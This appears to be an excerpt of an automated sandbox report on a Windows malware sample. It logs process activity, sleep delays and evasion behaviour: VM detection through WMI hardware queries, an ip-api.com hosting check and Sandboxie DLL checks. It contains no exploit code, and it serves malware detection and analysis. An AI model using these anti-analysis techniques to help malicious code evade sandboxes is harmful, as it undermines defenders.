                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Local\Lityerses\unjuridically.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Local\Lityerses\unjuridically.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

                Malware Analysis System Evasion

                barindex
                Yara detected AntiVM3
                Source: Yara matchFile source: Process Memory Space: unjuridically.exe PID: 6948, type: MEMORYSTR
                Source: Yara matchFile source: Process Memory Space: unjuridically.exe PID: 4564, type: MEMORYSTR
                Check if machine is in data center or colocation facility
                Source: global trafficHTTP traffic detected: GET /line/?fields=hosting HTTP/1.1Host: ip-api.comConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET /line/?fields=hosting HTTP/1.1Host: ip-api.comConnection: Keep-Alive
                Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_NetworkAdapterConfiguration
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_NetworkAdapterConfiguration
                Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_VideoController
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_VideoController
                Switches to a custom stack to bypass stack traces
                Source: C:\Users\user\AppData\Local\Lityerses\unjuridically.exeAPI/Special instruction interceptor: Address: CAFC1C
                Source: C:\Users\user\AppData\Local\Lityerses\unjuridically.exeAPI/Special instruction interceptor: Address: 16D5FAC
                Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
                Source: unjuridically.exe, 00000002.00000002.2067353396.0000000003430000.00000004.00001000.00020000.00000000.sdmp, RegSvcs.exe, 00000003.00000002.2202546408.0000000002AE1000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000003.00000002.2198847445.0000000000402000.00000040.80000000.00040000.00000000.sdmp, unjuridically.exe, 00000005.00000002.2201362371.0000000001F30000.00000004.00001000.00020000.00000000.sdmp, RegSvcs.exe, 00000006.00000002.4495084882.0000000003001000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: SBIEDLL.DLL
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 600000Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 599891Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 599766Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 599617Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 599516Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 599391Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 599276Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 599051Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 598923Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 598779Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 598672Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 598534Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 598422Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 598312Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 598201Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 598093Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 597984Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 597875Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 597766Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 597641Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 597531Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 597422Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 597313Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 597188Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 597063Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 596938Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 596828Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 596718Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 596610Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 596273Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 596134Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 596031Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 595922Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 595813Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 595688Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 595563Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 595453Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 595344Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 595219Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 595109Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 595000Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 594890Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 594781Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 594672Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 594563Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 594438Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 594328Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 594219Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 594094Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 593985Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 593860Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 600000Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 599875Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 599765Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 599633Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 599531Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 599421Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 599312Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 599203Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 599093Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 598984Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 598875Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 598765Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 598656Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 598547Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 598433Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 598306Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 598203Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 598093Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 597984Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 597874Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 597756Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 597635Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 597531Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 597421Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 597156Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 596984Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 596818Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 596703Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 596593Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 596484Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 596375Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 596265Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 596156Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 596047Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 595937Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 595828Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 595718Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 595609Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 595500Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 595390Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 595281Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 595172Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 595062Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 594953Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 594843Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 594734Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 594583Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 594361Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 594234Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 594125Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 594015Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 593906Jump to behavior
                Source: C:\Windows\System32\wscript.exeWindow found: window name: WSH-TimerJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeWindow / User API: threadDelayed 2538Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeWindow / User API: threadDelayed 7298Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeWindow / User API: threadDelayed 6920Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeWindow / User API: threadDelayed 2915Jump to behavior
                Source: C:\Users\user\Desktop\RHOqJ5BrHW.exeEvaded block: after key decisiongraph_0-94917
                Source: C:\Users\user\AppData\Local\Lityerses\unjuridically.exeEvaded block: after key decision
                Source: C:\Users\user\Desktop\RHOqJ5BrHW.exeEvasive API call chain: GetSystemTimeAsFileTime,DecisionNodesgraph_0-95619
                Source: C:\Users\user\AppData\Local\Lityerses\unjuridically.exeEvasive API call chain: GetSystemTimeAsFileTime,DecisionNodes
                Source: C:\Users\user\Desktop\RHOqJ5BrHW.exeAPI coverage: 4.6 %
                Source: C:\Users\user\AppData\Local\Lityerses\unjuridically.exeAPI coverage: 4.7 %
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeLast function: Thread delayed
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeLast function: Thread delayed
                Source: C:\Users\user\Desktop\RHOqJ5BrHW.exeCode function: 0_2_009C6CA9 GetFileAttributesW,FindFirstFileW,FindClose,0_2_009C6CA9
                Source: C:\Users\user\Desktop\RHOqJ5BrHW.exeCode function: 0_2_009C60DD _wcscat,_wcscat,__wsplitpath,FindFirstFileW,DeleteFileW,_wcscpy,_wcscat,_wcscat,lstrcmpiW,DeleteFileW,MoveFileW,MoveFileW,CopyFileW,DeleteFileW,CopyFileW,FindNextFileW,FindClose,FindClose,0_2_009C60DD
                Source: C:\Users\user\Desktop\RHOqJ5BrHW.exeCode function: 0_2_009C63F9 _wcscat,__wsplitpath,FindFirstFileW,_wcscpy,_wcscat,_wcscat,DeleteFileW,FindNextFileW,FindClose,0_2_009C63F9
                Source: C:\Users\user\Desktop\RHOqJ5BrHW.exeCode function: 0_2_009CEB60 FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,0_2_009CEB60
                Source: C:\Users\user\Desktop\RHOqJ5BrHW.exeCode function: 0_2_009CF5FA FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,0_2_009CF5FA
                Source: C:\Users\user\Desktop\RHOqJ5BrHW.exeCode function: 0_2_009CF56F FindFirstFileW,FindClose,0_2_009CF56F
                Source: C:\Users\user\Desktop\RHOqJ5BrHW.exeCode function: 0_2_009D1B2F SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,0_2_009D1B2F
                Source: C:\Users\user\Desktop\RHOqJ5BrHW.exeCode function: 0_2_009D1C8A SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,0_2_009D1C8A
                Source: C:\Users\user\Desktop\RHOqJ5BrHW.exeCode function: 0_2_009D1F94 FindFirstFileW,Sleep,_wcscmp,_wcscmp,FindNextFileW,FindClose,0_2_009D1F94
                Source: C:\Users\user\AppData\Local\Lityerses\unjuridically.exeCode function: 2_2_00466CA9 GetFileAttributesW,FindFirstFileW,FindClose,2_2_00466CA9
